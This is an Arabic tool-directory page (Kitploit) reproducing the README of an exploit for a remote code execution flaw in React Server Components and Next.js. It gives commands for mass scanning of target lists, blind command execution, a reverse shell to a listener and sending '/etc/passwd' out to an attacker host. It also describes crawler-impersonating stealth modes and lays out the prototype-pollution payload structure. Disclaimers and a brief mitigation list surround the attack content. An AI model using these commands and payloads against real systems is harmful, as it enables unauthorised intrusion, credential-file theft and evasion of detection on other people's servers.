Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/spritualkb/cve-2025-55182-exp
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليمالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHubspritualkb/cve-2025-55182-exp

CVE-2025-55182-exp

أداة استغلال CVE-2025-55182 لتنفيذ التعليمات البرمجية عن بُعد في React Server Components

46123منذ 9 أشهرتمت المراجعة من قبل Kitploit
عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182-exp

CVE Type Python License

🔥 نظرة عامة

CVE-2025-55182 هي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (Remote Code Execution - RCE) في مكوّنات خادم React (React Server Components - RSC) تؤثر على تطبيقات Next.js التي تستخدم App Router مع Server Actions.

توجد الثغرة في عملية إلغاء تسلسل بروتوكول Flight، مما يسمح للمهاجمين بتحقيق تنفيذ تعليمات برمجية عشوائية من خلال تلويث النموذج الأولي (prototype pollution).

⚠️ إخلاء المسؤولية

لأغراض الاختبارات الأمنية المصرَّح بها فقط

هذه الأداة مقدمة للأغراض التعليمية واختبارات الاختراق المصرَّح بها فقط. الوصول غير المصرَّح به إلى أنظمة الحاسوب غير قانوني. أي استخدام غير قانوني أو غير مصرَّح به لهذه الأداة يقع على عاتق المستخدم حصرًا، ولا يتحمل المؤلف أي مسؤولية على الإطلاق.

هذه الأداة مخصصة لاختبارات الأمن المصرَّح بها والأغراض التعليمية فقط. في حالة حدوث أي مخالفة أو عملية غير قانونية، يتحمل المستخدم كامل العواقب، ولا يتحمل المؤلف أي مسؤولية.

يرجى قراءة بالكامل قبل استخدام هذه الأداة.

DISCLAIMER.md

باستخدامك لهذه الأداة، فأنت توافق على ما يلي:

  • أنك حصلت على التصريح المناسب لأي اختبار
  • أنك ستلتزم بجميع القوانين واللوائح المعمول بها
  • أنك تتحمل المسؤولية الكاملة عن أفعالك
  • أن المؤلف لا يتحمل أي مسؤولية عن أي إساءة استخدام

📋 الإصدارات المتأثرة

المكوّنالإصدارات المتأثرة
react-server-dom-webpack19.0.0 - 19.2.0
Next.js15.x, 16.x (App Router + Server Actions)

🛠️ التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/Spritualkb/CVE-2025-55182-exp.git
cd CVE-2025-55182-exp

# Install dependencies
pip install requests
pip install requests[socks]  # For SOCKS5 proxy support

📖 الاستخدام

فحص هدف واحد

root@kitploit:~
python3 exploit.py http://target:3000 --check

الفحص الجماعي من ملف

root@kitploit:~
# Basic batch scan
python3 exploit.py -f targets.txt --check

# With stealth mode and delay
python3 exploit.py -f targets.txt --check --stealth crawler --delay 2

# Save vulnerable targets to file
python3 exploit.py -f targets.txt --check -o vulnerable.txt

تنفيذ أمر (RCE أعمى)

root@kitploit:~
python3 exploit.py http://target:3000 -c "id"

الشل العكسي (Reverse Shell)

root@kitploit:~
# Start listener first
nc -lvnp 4444

# Execute reverse shell
python3 exploit.py http://target:3000 --revshell 10.0.0.1 4444

استخراج مخرجات الأمر

root@kitploit:~
# Start listener
nc -lvnp 4444

# Execute and exfiltrate output
python3 exploit.py http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

استخدام البروكسي

root@kitploit:~
python3 exploit.py http://target:3000 --check --proxy socks5://127.0.0.1:1080

🎭 أوضاع التخفي

الوضعالوصف
browserيحاكي طلبات المتصفح الحقيقية (الافتراضي)
crawlerيحاكي زحّافات محركات البحث (Googlebot وBaiduspider وغيرها)
securityيستخدم وكلاء مستخدم (User-Agents) خاصة بماسحات الأمان

🔧 الخيارات

الخيارالوصف
targetعنوان الهدف (مثل http://localhost:3000)
-f, --fileملف يحتوي على عناوين الأهداف (عنوان واحد لكل سطر)
-o, --outputملف الإخراج للأهداف المعرّضة للثغرة
-c, --commandالأمر المراد تنفيذه (أعمى)
--checkالتحقق من وجود الثغرة
--proxyبروكسي SOCKS5 (مثل socks5://127.0.0.1:1080)
--stealthوضع التخفي: browser أو crawler أو security
--delayالتأخير بين الطلبات بالثواني
--variantsاستخدام متغيرات حمولة متعددة لفحص شامل
--revshell IP PORTشل عكسي إلى IP:PORT
--exfil CMD IP PORTتنفيذ CMD وإرسال المخرجات (POST) إلى IP:PORT
-t, --timeoutمهلة الطلب بالثواني (الافتراضي: 15)

🔬 التفاصيل التقنية

آلية الثغرة

يستغل هذا الاستغلال تلوث النموذج الأولي (prototype pollution) في عملية إلغاء تسلسل بروتوكول Flight:

  1. تلوث النموذج الأولي: يلوّث Object.prototype.then عبر "$1:__proto__:then"
  2. الوصول إلى مُنشئ الدالة: يعيّن _formData.get إلى مُنشئ Function عبر "$1:constructor:constructor"
  3. حقن التعليمات البرمجية: يحقن تعليمات برمجية خبيثة عبر _prefix التي تُمرَّر إلى Function()

بنية الحمولة

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "<malicious_code>",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

📁 بنية الملفات

root@kitploit:~
CVE-2025-55182-exp/
├── exploit.py      # Main exploit script
├── targets.txt     # Target URLs list (one per line)
└── README.md       # This file

📝 تنسيق ملف targets.txt

root@kitploit:~
# Comments start with #
http://target1.com:3000
https://target2.com
target3.com:3000

🛡️ التخفيف

  1. حدّث إلى أحدث الإصدارات المصحّحة من react-server-dom-webpack وNext.js
  2. طبّق التحقق من صحة المدخلات على Server Actions
  3. استخدم قواعد جدار حماية تطبيقات الويب (WAF) لكشف حمولات بروتوكول Flight الخبيثة
  4. راقب أخطاء الخادم غير المعتادة (HTTP 500) التي تحمل رسائل متعلقة بالنموذج الأولي

📜 الترخيص

هذا المشروع مرخّص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.


⚠️ إخلاء المسؤولية القانوني

النسخة الإنجليزية

شروط الاستخدام

بتحميل هذا البرنامج أو نسخه أو تثبيته أو استخدامه، فأنت توافق على الالتزام بشروط إخلاء المسؤولية هذا.

الغرض المقصود

صُمِّمت هذه الأداة حصريًا من أجل:

  • اختبارات الاختراق المصرَّح بها
  • البحث والتعليم في مجال الأمن
  • تقييم الثغرات الأمنية مع التصريح المناسب
  • مسابقات CTF (التقاط العلم - Capture The Flag)
  • بيئات المختبرات الشخصية

الاستخدام المحظور

يُحظر عليك استخدام هذه الأداة من أجل:

  • الوصول غير المصرَّح به إلى أنظمة الحاسوب
  • أي أنشطة غير قانونية
  • مهاجمة الأنظمة دون إذن كتابي صريح
  • التسبب في ضرر لأي أنظمة أو بيانات
  • أي أنشطة تنتهك القوانين المحلية أو الولائية أو الوطنية أو الدولية

عدم وجود ضمان

يُقدَّم هذا البرنامج «كما هو» دون أي نوع من الضمان، صريحًا كان أو ضمنيًا. يرفض المؤلف (المؤلفون) جميع الضمانات، بما في ذلك على سبيل المثال لا الحصر:

  • قابلية التسويق (الملاءمة التجارية)
  • الملاءمة لغرض معين
  • عدم الانتهاك

تحديد المسؤولية

لا يكون المؤلف (المؤلفون) مسؤولين بأي حال من الأحوال عن:

  • الأضرار المباشرة أو غير المباشرة أو العرضية أو الخاصة أو النموذجية أو التبعية
  • فقدان البيانات أو الأرباح أو فرص العمل
  • العواقب القانونية الناشئة عن إساءة استخدام هذه الأداة

مسؤولية المستخدم

يتحمل المستخدم المسؤولية الكاملة عن:

  • الحصول على التصريح المناسب قبل اختبار أي نظام
  • الامتثال لجميع القوانين واللوائح المعمول بها
  • أي عواقب تنتج عن استخدام هذه الأداة
  • ضمان مشروعية أفعاله في نطاق ولايته القضائية

الإقرار

باستخدامك لهذه الأداة، فأنت تقرّ بما يلي:

  1. أنك قرأت وفهمت إخلاء المسؤولية هذا
  2. أنك ستستخدم هذه الأداة فقط للأغراض القانونية والمصرَّح بها
  3. أنك تقبل جميع المخاطر المرتبطة باستخدام هذه الأداة
  4. أن المؤلف (المؤلفين) لا يتحملون أي مسؤولية عن أي إساءة استخدام

النسخة الصينية

شروط الاستخدام

بتحميل هذا البرنامج أو نسخه أو تثبيته أو استخدامه، فأنت توافق على الالتزام بشروط إخلاء المسؤولية هذا.

الاستخدام المقصود

هذه الأداة مخصصة حصريًا من أجل:

  • اختبارات الاختراق المصرَّح بها
  • البحث والتعليم في مجال الأمن
  • تقييم الثغرات الأمنية مع التصريح المناسب
  • مسابقات CTF (التقاط العلم - Capture The Flag)
  • بيئات المختبرات الشخصية

الاستخدام المحظور

يُحظر عليك استخدام هذه الأداة من أجل:

  • الوصول غير المصرَّح به إلى أنظمة الحاسوب
  • أي أنشطة غير قانونية
  • مهاجمة الأنظمة دون إذن كتابي صريح
  • التسبب في ضرر لأي أنظمة أو بيانات
  • أي أنشطة تنتهك القوانين المحلية أو الولائية أو الوطنية أو الدولية

عدم وجود ضمان

يُقدَّم هذا البرنامج «كما هو» دون أي نوع من الضمان، صريحًا كان أو ضمنيًا. يرفض المؤلف (المؤلفون) جميع الضمانات، بما في ذلك على سبيل المثال لا الحصر:

  • قابلية التسويق (الملاءمة التجارية)
  • الملاءمة لغرض معين
  • عدم الانتهاك

تحديد المسؤولية

لا يكون المؤلف (المؤلفون) مسؤولين بأي حال من الأحوال عن:

  • الأضرار المباشرة أو غير المباشرة أو العرضية أو الخاصة أو النموذجية أو التبعية
  • فقدان البيانات أو الأرباح أو فرص العمل
  • العواقب القانونية الناشئة عن إساءة استخدام هذه الأداة

مسؤولية المستخدم

يتحمل المستخدم المسؤولية الكاملة عن:

  • الحصول على التصريح المناسب قبل اختبار أي نظام
  • الامتثال لجميع القوانين واللوائح المعمول بها
  • أي عواقب تنتج عن استخدام هذه الأداة
  • ضمان مشروعية أفعاله في نطاق ولايته القضائية

الإقرار

باستخدامك لهذه الأداة، فأنت تقرّ بما يلي:

  1. أنك قرأت وفهمت إخلاء المسؤولية هذا
  2. أنك ستستخدم هذه الأداة فقط للأغراض القانونية والمصرَّح بها
  3. أنك تقبل جميع المخاطر المرتبطة باستخدام هذه الأداة
  4. أن المؤلف (المؤلفين) لا يتحملون أي مسؤولية عن أي إساءة استخدام

المراجع القانونية

القوانين ذات الصلة

  • الصين: قانون الأمن السيبراني لجمهورية الصين الشعبية، والمواد 285 و286 من قانون العقوبات لجمهورية الصين الشعبية
  • الولايات المتحدة الأمريكية: قانون الاحتيال وإساءة استخدام الحاسوب (CFAA)، 18 U.S.C. § 1030
  • الاتحاد الأوروبي: التوجيه 2013/40/EU بشأن الهجمات على أنظمة المعلومات
  • المملكة المتحدة: قانون إساءة استخدام الحاسوب لعام 1990

متطلبات التصريح بالاختبار

قبل إجراء أي اختبار أمني، يجب عليك:

  1. الحصول على تصريح كتابي من مالك النظام
  2. تحديد نطاق الاختبار وحدوده بوضوح
  3. الامتثال لجميع القوانين واللوائح المعمول بها
  4. توثيق جميع أنشطة الاختبار

قبل إجراء أي اختبار أمني، يجب عليك:

  1. الحصول على تصريح كتابي من مالك النظام
  2. تحديد نطاق الاختبار وحدوده بوضوح
  3. الامتثال لجميع القوانين واللوائح المعمول بها
  4. توثيق جميع أنشطة الاختبار

⚠️ الوصول غير المصرَّح به إلى الحاسوب عمل غير قانوني ⚠️
⚠️ الوصول غير المصرَّح به إلى أنظمة الحاسوب جريمة جنائية ⚠️

تنزيل الأداة